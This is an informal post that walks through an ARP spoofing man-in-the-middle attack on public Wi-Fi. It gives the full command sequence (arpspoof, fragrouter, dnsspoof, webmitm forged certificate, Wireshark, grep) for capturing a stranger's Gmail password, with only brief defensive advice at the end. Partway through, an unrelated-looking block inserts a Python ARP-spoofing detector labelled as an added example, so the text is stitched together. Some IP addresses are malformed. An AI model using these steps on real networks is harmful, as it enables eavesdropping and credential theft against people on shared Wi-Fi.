ARP spoofing

Ok, so I decided, now that I have said a little about myself and what I am dealing with, I suppose I will throw something out here that is actually "useful" to you guys. I do not condone this, blah blah, you get it :P Anyway, what I will be explaining here is a "man-in-the-middle" attack used commonly on wifi networks, because they are open and lots of people get on. This is just to inform you how this works, and what could be happening to you when you're at Starbucks, drinking your coffee, checking your email, and deciding to edit some banking info. So here is how this works. Basically, while you are getting your jollies at Yahoo and Gmail and that junk, someone is intercepting your traffic and reading everything that you are typing ;). Sucks right? Yeah it does ;). This attack will grab specifically your Gmail password, and in the meantime you can browse all the packets that are coming from the victim. So what goes down for real here? You're browsing, someone gets between you and the router, and routes your traffic to the router, so it looks like this:

YOU_BROWSING----->Attacker------>Router.

Basically, you are really sending him your packets, and he is just routing them to the router, which then goes out to the internet, etc. So what does he have to do to get this going? Let's assume he is using Ubuntu. Here is what he would do; this is just one out of many ways this could be done, by the way.

First and foremost, he would grab the IP of the gateway, and yours.

nmap -sS 192.168.0.1.1-100 --> scans network IP addresses for open ports using a TCP SYN scan. Applying it to the other ranges will do as well, say 192.168.1.1-100.

Say your IP is 192.168.1.47 and the gateway IP is 192.168.1.1.

nmap -sT 192.168.1.1.47 --> A TCP connect scan, displaying what's going on with your machine.

Alternatively, arp -a will work, showing your ARP table, and you can see your router there.

Anyway, after he has your IP, it would be time to move on.

We will use arpspoof to redirect the network traffic to our computer.

sudo arpspoof -i wlan0 -t 192.168.1.47 192.168.1.1

where wlan0 is your wireless interface.

This will send out ARP replies to the victim saying that the gateway IP address is at our computer's MAC address, letting us receive all traffic from the victim.
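Those forged replies are also what gives the attack away on the wire: the gateway's IP suddenly shows up with a second MAC address. Below is an added example (not from the original post) of a small arpwatch-style monitor that parses raw Ethernet/ARP frames and alerts when an IP address it has already learned is claimed by a different MAC. The MAC addresses and the sample frames are constructed for the demo; only the 192.168.1.1 / 192.168.1.47 addresses come from the walkthrough above.

```python
import struct
from ipaddress import ip_address

ETH = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")  # hw/proto type, lens, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
OP_REPLY = 2

def mac(s):
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes.fromhex(s.replace(":", ""))

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def sample_arp_reply(src_mac, sender_ip, dst_mac, target_ip):
    """Build one Ethernet-encapsulated ARP reply; used only to construct sample input."""
    return ETH.pack(mac(dst_mac), mac(src_mac), ETHERTYPE_ARP) + ARP.pack(
        1, 0x0800, 6, 4, OP_REPLY, mac(src_mac), ip_address(sender_ip).packed,
        mac(dst_mac), ip_address(target_ip).packed)

def parse_arp_reply(frame):
    """Return (sender_mac, sender_ip) for an ARP reply, or None for any other frame."""
    if len(frame) < ETH.size + ARP.size:
        return None
    _, _, ethertype = ETH.unpack_from(frame)
    if ethertype != ETHERTYPE_ARP:
        return None
    _, _, _, _, op, sha, spa, _, _ = ARP.unpack_from(frame, ETH.size)
    if op != OP_REPLY:
        return None
    return mac_str(sha), str(ip_address(spa))

class ArpMonitor:
    """Remember the first MAC seen for each IP and flag later replies that disagree."""
    def __init__(self):
        self.table = {}  # ip -> mac learned from the first reply seen

    def observe(self, frame):
        parsed = parse_arp_reply(frame)
        if parsed is None:
            return None
        sender_mac, sender_ip = parsed
        known = self.table.setdefault(sender_ip, sender_mac)
        if known != sender_mac:
            return f"ALERT: {sender_ip} moved from {known} to {sender_mac}"
        return None

def demo():
    """Constructed traffic: the real gateway answers twice, then a spoofed reply claims its IP."""
    gateway, victim, attacker = "00:11:22:33:44:01", "00:11:22:33:44:47", "de:ad:be:ef:00:01"
    frames = [sample_arp_reply(gateway, "192.168.1.1", victim, "192.168.1.47"),
              sample_arp_reply(gateway, "192.168.1.1", victim, "192.168.1.47"),
              sample_arp_reply(attacker, "192.168.1.1", victim, "192.168.1.47")]
    mon = ArpMonitor()
    return [alert for alert in (mon.observe(f) for f in frames) if alert]

if __name__ == "__main__":
    print("\n".join(demo()))
```

On a real host the frames would come from a raw socket or a pcap file instead of the constructed list, and the learned table would be seeded with the known gateway MAC so the first poisoned reply is caught even if it arrives before a legitimate one.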

Next, open a new terminal window and enter this. Make sure you let all of these commands keep running, and don't close the window :P

sudo fragrouter -i wlan0 -B1

Again, wlan0 is your wireless interface.

This begins the IP forwarding, so that the traffic goes through you to the gateway, etc.

Next, DNS spoofing, in a new window naturally.

sudo dnsspoof -i wlan0

This starts a DNS server on your computer which replies to all DNS requests with your computer's IP address, meaning all the URLs come through you.

Next we're going to make a fake certificate, in a new window ;)

sudo webmitm

Follow the prompts, and enter totally bogus information ;) Make it look legit though :p
This just creates a fake certificate to pop up on the Gmail SSL login page.

Next start wireshark.

sudo wireshark

From there, click capture interfaces.
Find the line with "your" IP address in it, wlan0 for me, and click the capture button.
Let it run as long as you want, to load the packets from your friendly neighbour checking his Gmail over there at counter #5.


So now, say that "you" are browsing the internet and decide to log into your Gmail account. You do so, only you get a certificate pop-up, and you click continue like you always do ;)


Now back to being the attacker.

Stop that capture, and save it as gmail-text.
Now let's find the password.

Assuming that you saved it to your home directory, and you are in that directory:

cat gmail-text | grep pass

Bam. You should have that Gmail password in clear text. And if you open that Wireshark log, you should be able to see any and all traffic that "you" were performing.

So say this attacker is pulling this stunt on you while you have Yahoo Messenger open, telling your friend how awesome it is that you could get away with cheating on your wife ;). Don't cheat on your wife and tell someone else!!!! Anyway, the attacker now has everything you have said, any websites you have visited, anything ;).

So how do you avoid this? Simple. Inspect your certificates ;). If they are not from the site you're visiting, or look very funky, simply say no, and check your friggin email when you get home :P

Hope you learned something, especially about how insecure 802.11b/g networks can be. ESPECIALLY public ones. Be careful guys.

Peace.
